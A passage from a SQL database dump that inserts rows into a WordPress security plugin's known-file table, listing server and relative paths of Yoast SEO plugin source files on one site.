(1482, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/exceptions/indexable/invalid-term-exception.php', 'wp-content/plugins/wordpress-seo/src/exceptions/indexable/invalid-term-exception.php'),
(1483, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/exceptions/indexable/not-built-exception.php', 'wp-content/plugins/wordpress-seo/src/exceptions/indexable/not-built-exception.php'),
(1484, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/exceptions/indexable/post-not-built-exception.php', 'wp-content/plugins/wordpress-seo/src/exceptions/indexable/post-not-built-exception.php'),
(1485, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/exceptions/indexable/post-not-found-exception.php', 'wp-content/plugins/wordpress-seo/src/exceptions/indexable/post-not-found-exception.php'),
(1486, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/exceptions/indexable/post-type-not-built-exception.php', 'wp-content/plugins/wordpress-seo/src/exceptions/indexable/post-type-not-built-exception.php'),
(1487, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/exceptions/indexable/source-exception.php', 'wp-content/plugins/wordpress-seo/src/exceptions/indexable/source-exception.php'),
(1488, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/exceptions/indexable/term-not-built-exception.php', 'wp-content/plugins/wordpress-seo/src/exceptions/indexable/term-not-built-exception.php'),
(1489, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/exceptions/indexable/term-not-found-exception.php', 'wp-content/plugins/wordpress-seo/src/exceptions/indexable/term-not-found-exception.php'),
(1490, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/exceptions/missing-method.php', 'wp-content/plugins/wordpress-seo/src/exceptions/missing-method.php'),
(1491, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/exceptions/oauth/authentication-failed-exception.php', 'wp-content/plugins/wordpress-seo/src/exceptions/oauth/authentication-failed-exception.php'),
(1492, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/exceptions/oauth/tokens/empty-property-exception.php', 'wp-content/plugins/wordpress-seo/src/exceptions/oauth/tokens/empty-property-exception.php'),
(1493, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/exceptions/oauth/tokens/empty-token-exception.php', 'wp-content/plugins/wordpress-seo/src/exceptions/oauth/tokens/empty-token-exception.php'),
(1494, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/exceptions/oauth/tokens/failed-storage-exception.php', 'wp-content/plugins/wordpress-seo/src/exceptions/oauth/tokens/failed-storage-exception.php'),
(1495, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/functions.php', 'wp-content/plugins/wordpress-seo/src/functions.php'),
(1496, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/generated/assets/externals.php', 'wp-content/plugins/wordpress-seo/src/generated/assets/externals.php'),
(1497, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/generated/assets/languages.php', 'wp-content/plugins/wordpress-seo/src/generated/assets/languages.php'),
(1498, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/generated/assets/plugin.php', 'wp-content/plugins/wordpress-seo/src/generated/assets/plugin.php'),
(1499, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/generated/container.php', 'wp-content/plugins/wordpress-seo/src/generated/container.php'),
(1500, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/generators/breadcrumbs-generator.php', 'wp-content/plugins/wordpress-seo/src/generators/breadcrumbs-generator.php'),
(1501, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/generators/generator-interface.php', 'wp-content/plugins/wordpress-seo/src/generators/generator-interface.php'),
(1502, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/generators/open-graph-image-generator.php', 'wp-content/plugins/wordpress-seo/src/generators/open-graph-image-generator.php'),
(1503, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/generators/open-graph-locale-generator.php', 'wp-content/plugins/wordpress-seo/src/generators/open-graph-locale-generator.php'),
(1504, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/generators/schema/abstract-schema-piece.php', 'wp-content/plugins/wordpress-seo/src/generators/schema/abstract-schema-piece.php'),
(1505, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/generators/schema/article.php', 'wp-content/plugins/wordpress-seo/src/generators/schema/article.php'),
(1506, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/generators/schema/author.php', 'wp-content/plugins/wordpress-seo/src/generators/schema/author.php'),
(1507, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/generators/schema/breadcrumb.php', 'wp-content/plugins/wordpress-seo/src/generators/schema/breadcrumb.php'),
(1508, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/generators/schema/faq.php', 'wp-content/plugins/wordpress-seo/src/generators/schema/faq.php'),
(1509, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/generators/schema/howto.php', 'wp-content/plugins/wordpress-seo/src/generators/schema/howto.php'),
(1510, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/generators/schema/main-image.php', 'wp-content/plugins/wordpress-seo/src/generators/schema/main-image.php'),
(1511, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/generators/schema/organization.php', 'wp-content/plugins/wordpress-seo/src/generators/schema/organization.php'),
(1512, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/generators/schema/person.php', 'wp-content/plugins/wordpress-seo/src/generators/schema/person.php'),
(1513, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/generators/schema/webpage.php', 'wp-content/plugins/wordpress-seo/src/generators/schema/webpage.php'),
(1514, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/generators/schema/website.php', 'wp-content/plugins/wordpress-seo/src/generators/schema/website.php'),
(1515, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/generators/schema-generator.php', 'wp-content/plugins/wordpress-seo/src/generators/schema-generator.php'),
(1516, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/generators/twitter-image-generator.php', 'wp-content/plugins/wordpress-seo/src/generators/twitter-image-generator.php'),
(1517, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/aioseo-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/aioseo-helper.php'),
(1518, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/asset-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/asset-helper.php'),
(1519, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/attachment-cleanup-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/attachment-cleanup-helper.php'),
(1520, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/author-archive-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/author-archive-helper.php'),
(1521, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/blocks-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/blocks-helper.php'),
(1522, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/capability-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/capability-helper.php'),
(1523, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/crawl-cleanup-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/crawl-cleanup-helper.php'),
(1524, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/curl-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/curl-helper.php'),
(1525, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/current-page-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/current-page-helper.php'),
(1526, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/date-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/date-helper.php'),
(1527, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/environment-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/environment-helper.php'),
(1528, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/first-time-configuration-notice-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/first-time-configuration-notice-helper.php'),
(1529, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/home-url-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/home-url-helper.php'),
(1530, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/image-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/image-helper.php'),
(1531, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/import-cursor-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/import-cursor-helper.php'),
(1532, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/import-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/import-helper.php'),
(1533, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/indexable-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/indexable-helper.php'),
(1534, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/indexable-to-postmeta-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/indexable-to-postmeta-helper.php'),
(1535, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/indexing-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/indexing-helper.php'),
(1536, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/language-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/language-helper.php'),
(1537, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/meta-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/meta-helper.php'),
(1538, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/notification-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/notification-helper.php'),
(1539, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/open-graph/image-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/open-graph/image-helper.php'),
(1540, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/open-graph/values-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/open-graph/values-helper.php'),
(1541, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/options-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/options-helper.php'),
(1542, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/pagination-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/pagination-helper.php'),
(1543, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/permalink-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/permalink-helper.php'),
(1544, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/post-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/post-helper.php'),
(1545, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/post-type-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/post-type-helper.php'),
(1546, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/primary-term-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/primary-term-helper.php'),
(1547, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/product-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/product-helper.php'),
(1548, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/redirect-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/redirect-helper.php'),
(1549, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/request-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/request-helper.php'),
(1550, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/require-file-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/require-file-helper.php'),
(1551, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/robots-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/robots-helper.php'),
(1552, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/robots-txt-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/robots-txt-helper.php'),
(1553, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/sanitization-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/sanitization-helper.php'),
(1554, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/schema/article-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/schema/article-helper.php'),
(1555, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/schema/html-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/schema/html-helper.php'),
(1556, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/schema/id-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/schema/id-helper.php'),
(1557, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/schema/image-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/schema/image-helper.php'),
(1558, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/schema/language-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/schema/language-helper.php'),
(1559, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/schema/replace-vars-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/schema/replace-vars-helper.php'),
(1560, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/score-icon-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/score-icon-helper.php'),
(1561, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/short-link-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/short-link-helper.php'),
(1562, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/site-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/site-helper.php'),
(1563, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/social-profiles-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/social-profiles-helper.php'),
(1564, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/string-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/string-helper.php'),
(1565, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/taxonomy-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/taxonomy-helper.php'),
(1566, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/twitter/image-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/twitter/image-helper.php'),
(1567, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/url-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/url-helper.php'),
(1568, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/user-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/user-helper.php'),
(1569, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/wincher-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/wincher-helper.php'),
(1570, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/woocommerce-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/woocommerce-helper.php'),
(1571, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/wordpress-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/wordpress-helper.php'),
(1572, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/wordproof-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/wordproof-helper.php'),
(1573, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/wpdb-helper.php', 'wp-content/plugins/wordpress-seo/src/helpers/wpdb-helper.php'),
(1574, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/initializers/crawl-cleanup-permalinks.php', 'wp-content/plugins/wordpress-seo/src/initializers/crawl-cleanup-permalinks.php'),
(1575, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/initializers/disable-core-sitemaps.php', 'wp-content/plugins/wordpress-seo/src/initializers/disable-core-sitemaps.php'),
(1576, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/initializers/initializer-interface.php', 'wp-content/plugins/wordpress-seo/src/initializers/initializer-interface.php'),
(1577, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/initializers/migration-runner.php', 'wp-content/plugins/wordpress-seo/src/initializers/migration-runner.php'),
(1578, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/initializers/woocommerce.php', 'wp-content/plugins/wordpress-seo/src/initializers/woocommerce.php'),
(1579, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/abstract-exclude-post-type.php', 'wp-content/plugins/wordpress-seo/src/integrations/abstract-exclude-post-type.php'),
(1580, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/academy-integration.php', 'wp-content/plugins/wordpress-seo/src/integrations/academy-integration.php'),
(1581, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/admin/activation-cleanup-integration.php', 'wp-content/plugins/wordpress-seo/src/integrations/admin/activation-cleanup-integration.php'),
(1582, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/admin/addon-installation/dialog-integration.php', 'wp-content/plugins/wordpress-seo/src/integrations/admin/addon-installation/dialog-integration.php'),
(1583, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/admin/addon-installation/installation-integration.php', 'wp-content/plugins/wordpress-seo/src/integrations/admin/addon-installation/installation-integration.php'),
(1584, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/admin/admin-columns-cache-integration.php', 'wp-content/plugins/wordpress-seo/src/integrations/admin/admin-columns-cache-integration.php'),
(1585, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/admin/background-indexing-integration.php', 'wp-content/plugins/wordpress-seo/src/integrations/admin/background-indexing-integration.php'),
(1586, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/admin/crawl-settings-integration.php', 'wp-content/plugins/wordpress-seo/src/integrations/admin/crawl-settings-integration.php'),
(1587, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/admin/cron-integration.php', 'wp-content/plugins/wordpress-seo/src/integrations/admin/cron-integration.php'),
(1588, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/admin/deactivated-premium-integration.php', 'wp-content/plugins/wordpress-seo/src/integrations/admin/deactivated-premium-integration.php'),
(1589, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/admin/disable-concatenate-scripts-integration.php', 'wp-content/plugins/wordpress-seo/src/integrations/admin/disable-concatenate-scripts-integration.php'),
(1590, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/admin/first-time-configuration-integration.php', 'wp-content/plugins/wordpress-seo/src/integrations/admin/first-time-configuration-integration.php'),
(1591, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/admin/first-time-configuration-notice-integration.php', 'wp-content/plugins/wordpress-seo/src/integrations/admin/first-time-configuration-notice-integration.php'),
(1592, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/admin/fix-news-dependencies-integration.php', 'wp-content/plugins/wordpress-seo/src/integrations/admin/fix-news-dependencies-integration.php'),
(1593, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/admin/health-check-integration.php', 'wp-content/plugins/wordpress-seo/src/integrations/admin/health-check-integration.php'),
(1594, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/admin/helpscout-beacon.php', 'wp-content/plugins/wordpress-seo/src/integrations/admin/helpscout-beacon.php'),
(1595, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/admin/import-integration.php', 'wp-content/plugins/wordpress-seo/src/integrations/admin/import-integration.php'),
(1596, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/admin/indexables-exclude-taxonomy-integration.php', 'wp-content/plugins/wordpress-seo/src/integrations/admin/indexables-exclude-taxonomy-integration.php'),
(1597, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/admin/indexing-notification-integration.php', 'wp-content/plugins/wordpress-seo/src/integrations/admin/indexing-notification-integration.php');
INSERT INTO `wpou_wfknownfilelist` VALUES
(1598, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/admin/indexing-tool-integration.php', 'wp-content/plugins/wordpress-seo/src/integrations/admin/indexing-tool-integration.php'),
(1599, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/admin/installation-success-integration.php', 'wp-content/plugins/wordpress-seo/src/integrations/admin/installation-success-integration.php'),
(1600, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/admin/integrations-page.php', 'wp-content/plugins/wordpress-seo/src/integrations/admin/integrations-page.php'),
(1601, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/admin/link-count-columns-integration.php', 'wp-content/plugins/wordpress-seo/src/integrations/admin/link-count-columns-integration.php'),
(1602, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/admin/menu-badge-integration.php', 'wp-content/plugins/wordpress-seo/src/integrations/admin/menu-badge-integration.php'),
(1603, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/admin/migration-error-integration.php', 'wp-content/plugins/wordpress-seo/src/integrations/admin/migration-error-integration.php'),
(1604, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/admin/old-configuration-integration.php', 'wp-content/plugins/wordpress-seo/src/integrations/admin/old-configuration-integration.php'),
(1605, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/admin/redirect-integration.php', 'wp-content/plugins/wordpress-seo/src/integrations/admin/redirect-integration.php'),
(1606, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/admin/redirects-page-integration.php', 'wp-content/plugins/wordpress-seo/src/integrations/admin/redirects-page-integration.php'),
(1607, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/admin/workouts-integration.php', 'wp-content/plugins/wordpress-seo/src/integrations/admin/workouts-integration.php'),
(1608, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/alerts/abstract-dismissable-alert.php', 'wp-content/plugins/wordpress-seo/src/integrations/alerts/abstract-dismissable-alert.php'),
(1609, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/alerts/black-friday-product-editor-checklist-notification.php', 'wp-content/plugins/wordpress-seo/src/integrations/alerts/black-friday-product-editor-checklist-notification.php'),
(1610, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/alerts/black-friday-promotion-notification.php', 'wp-content/plugins/wordpress-seo/src/integrations/alerts/black-friday-promotion-notification.php'),
(1611, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/alerts/black-friday-sidebar-checklist-notification.php', 'wp-content/plugins/wordpress-seo/src/integrations/alerts/black-friday-sidebar-checklist-notification.php'),
(1612, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/alerts/jetpack-boost-pre-publish.php', 'wp-content/plugins/wordpress-seo/src/integrations/alerts/jetpack-boost-pre-publish.php'),
(1613, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/alerts/trustpilot-review-notification.php', 'wp-content/plugins/wordpress-seo/src/integrations/alerts/trustpilot-review-notification.php'),
(1614, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/alerts/webinar-promo-notification.php', 'wp-content/plugins/wordpress-seo/src/integrations/alerts/webinar-promo-notification.php'),
(1615, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/blocks/abstract-dynamic-block.php', 'wp-content/plugins/wordpress-seo/src/integrations/blocks/abstract-dynamic-block.php'),
(1616, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/blocks/block-categories.php', 'wp-content/plugins/wordpress-seo/src/integrations/blocks/block-categories.php'),
(1617, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/blocks/breadcrumbs-block.php', 'wp-content/plugins/wordpress-seo/src/integrations/blocks/breadcrumbs-block.php'),
(1618, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/blocks/structured-data-blocks.php', 'wp-content/plugins/wordpress-seo/src/integrations/blocks/structured-data-blocks.php'),
(1619, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/breadcrumbs-integration.php', 'wp-content/plugins/wordpress-seo/src/integrations/breadcrumbs-integration.php'),
(1620, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/cleanup-integration.php', 'wp-content/plugins/wordpress-seo/src/integrations/cleanup-integration.php'),
(1621, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/duplicate-post-integration.php', 'wp-content/plugins/wordpress-seo/src/integrations/duplicate-post-integration.php'),
(1622, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/estimated-reading-time.php', 'wp-content/plugins/wordpress-seo/src/integrations/estimated-reading-time.php'),
(1623, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/exclude-attachment-post-type.php', 'wp-content/plugins/wordpress-seo/src/integrations/exclude-attachment-post-type.php'),
(1624, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/exclude-oembed-cache-post-type.php', 'wp-content/plugins/wordpress-seo/src/integrations/exclude-oembed-cache-post-type.php'),
(1625, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/feature-flag-integration.php', 'wp-content/plugins/wordpress-seo/src/integrations/feature-flag-integration.php'),
(1626, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/front-end/backwards-compatibility.php', 'wp-content/plugins/wordpress-seo/src/integrations/front-end/backwards-compatibility.php'),
(1627, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/front-end/category-term-description.php', 'wp-content/plugins/wordpress-seo/src/integrations/front-end/category-term-description.php'),
(1628, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/front-end/comment-link-fixer.php', 'wp-content/plugins/wordpress-seo/src/integrations/front-end/comment-link-fixer.php'),
(1629, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/front-end/crawl-cleanup-basic.php', 'wp-content/plugins/wordpress-seo/src/integrations/front-end/crawl-cleanup-basic.php'),
(1630, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/front-end/crawl-cleanup-rss.php', 'wp-content/plugins/wordpress-seo/src/integrations/front-end/crawl-cleanup-rss.php'),
(1631, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/front-end/crawl-cleanup-searches.php', 'wp-content/plugins/wordpress-seo/src/integrations/front-end/crawl-cleanup-searches.php'),
(1632, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/front-end/feed-improvements.php', 'wp-content/plugins/wordpress-seo/src/integrations/front-end/feed-improvements.php'),
(1633, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/front-end/force-rewrite-title.php', 'wp-content/plugins/wordpress-seo/src/integrations/front-end/force-rewrite-title.php'),
(1634, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/front-end/handle-404.php', 'wp-content/plugins/wordpress-seo/src/integrations/front-end/handle-404.php'),
